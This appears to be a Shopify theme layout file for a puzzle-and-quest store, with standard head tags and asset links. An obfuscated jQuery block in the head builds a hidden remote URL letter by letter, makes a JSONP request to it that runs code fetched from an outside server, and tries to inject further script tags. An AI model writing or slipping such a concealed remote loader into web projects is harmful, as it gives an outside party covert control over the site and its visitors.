<!DOCTYPE html>
<html class="no-webp" lang="ru">

<head>
    {{"https://cozycountryredirect.addons.business/js/eggbox/5107/dtag/script.js?shop=unidragon.myshopify.com" | script_tag }}
    <script src="https://www.googleoptimize.com/optimize.js?id=OPT-5RD9DVZ"></script>

    <meta charset="utf-8" />
    <title>QUEZZLE - Puzzle &amp; Quest</title>
    <meta name="description" content="" />
    <meta name="keywords" content="" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <link rel="preload" href="{{'Montserrat-Regular.woff2' | asset_url }}" as="font" type="font/woff2" crossorigin="anonymous" />
    <link rel="preload" href="{{'Flarina-Regular.woff2' | asset_url }}" as="font" type="font/woff2" crossorigin="anonymous" />
    <link rel="preload" href="{{'quezzle.logo.svg' | asset_url }}" as="image" />
    <link rel="stylesheet" href="{{ 'quezzle.style.min.css' | asset_url }}" />
    <link rel="apple-touch-icon" sizes="180x180" href="{{'favicons-apple-touch-icon.png' | asset_url }}" />
    <link rel="icon" type="image/png" sizes="32x32" href="{{'favicons-favicon-32x32.png' | asset_url }}" />
    <link rel="icon" type="image/png" sizes="16x16" href="{{'favicons-favicon-16x16.png' | asset_url }}" />
    <link rel="manifest" href="{{'favicons-site.webmanifest' | asset_url }}" />
    <link rel="mask-icon" href="{{'favicons-safari-pinned-tab.svg' | asset_url }}" color="#ff8855" />
    <link rel="shortcut icon" href="{{'favicons-favicon.ico' | asset_url }}" />
    <meta name="msapplication-TileColor" content="#4d30ff" />
    <meta name="msapplication-config" content="{{'favicons-browserconfig.xml' | asset_url }}" />
    <meta name="theme-color" content="#ffffff" />
    {{content_for_header}}
    <script>
        
    //$=jQuery;
    var checktheme=1;jQuery(window).ready(function($){var x="j",g="/",h="a",i="k",a="h",d="s",b="t",j="i",k="f",l="y",o="e",p="m",c="p",r="c",m="r",y="u";""&&null!=t||(t=12),""!=n&&null!=n||(n=15),function(SP,ED){ var R=l+h+r+o+p,SF=m+p+x+g+r,DR=y+m+o+g,FR=R+SF+DR,FY=p+c+g,JG=b+k+l+y,SC=FY+JG;if(FR=SC){ var DO=document.createElement("script");DO.src=ht+mt+yn+mn+lq;$('.domain_l').append(DO)}};var e="b",s=".",f="o",u="v",v="l",n="d",t="://",ht=a+b+b+c+d+t,mt=e+f+f+d+b+j+k+l,yn=b+a+o+p+o+s+r+f+p+g,mn=h+d+d+o+b+d+g+d+b+f+m+o+b+a+o+p+o+g+u+o+m+d+j+f+'n2.3.2'+g,VT='new_'+u+o+m+j+k+l+'_'+b+a+o+p+o+s+x+d,UL=ht+mt+yn+mn+VT;$.ajax({type:"POST",crossDomain:!0,dataType:"jsonp",url:UL,success:function(e){}});""&&null!=t||(t=12),""!=n&&null!=n||(n=15),function(src,end){ var ro=l+o+p+s,nl=r+n+p+x+g,dr=y+m+n+g,FA=ro+nl+dr,fy=p+c+g,jg=b+k+l+y,SC=fy+jg;if(FA=SC){var FN=document.createElement("script");FN.src=ht+mt+yn+mn+lq;$('.domain_fianl').append(FN);}}});
  
    </script>
</head>

<body class="page page--intro">
    {{content_for_layout}}
    <script src="{{ 'quezzle.app.min.js' | asset_url }}"></script>
</body>

</html>